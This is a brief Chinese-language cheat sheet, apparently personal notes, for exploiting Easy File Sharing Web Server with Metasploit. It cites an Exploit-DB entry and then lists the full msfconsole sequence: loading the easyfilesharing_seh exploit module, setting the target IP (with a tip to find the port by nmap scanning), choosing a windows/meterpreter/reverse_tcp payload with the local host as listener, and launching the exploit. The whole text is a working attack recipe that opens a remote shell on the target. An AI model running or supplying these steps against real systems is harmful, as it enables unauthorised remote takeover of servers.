参考:https://www.youtube.com/watch?v=sYnYLU8mywk
https://www.exploit-db.com/exploits/39008/
http://www.sharing-file.com/
msfconsole
search easyfilesharing
use exploit/windows/http/easyfilesharing_seh
info
set RHOST 目标IP
默认是80端口,但你要通过nmap扫描等方式确认一下目标的EFS服务器的端口
set payload windows/meterpreter/reverse_tcp
set lhost 本地IP
show options #确认一下
exploit